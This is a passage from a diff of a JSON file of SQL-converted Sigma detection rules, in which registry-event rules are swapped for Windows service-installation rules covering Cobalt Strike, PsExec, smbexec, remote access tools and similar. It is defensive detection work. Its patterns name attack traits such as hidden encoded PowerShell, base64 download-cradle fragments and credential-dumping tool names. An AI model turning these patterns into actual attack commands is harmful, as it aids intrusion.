"win_system_service_install_mesh_agent.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates 
privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "TacticalRMM Service Installation", + 
"id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth 
(Nextron Systems), wagga", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "PsExec Service Installation", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", 
+ "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_psexec.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", - "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "status": "test", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE 
'\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": 
"OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE 
'\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName 
LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth 
(Nextron Systems)", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ "attack.lateral_movement", - "attack.t1105" + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value 
modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.002" + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE 
'%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created 
during Azorult execution", - "author": "Trent Liffick", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. 
Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
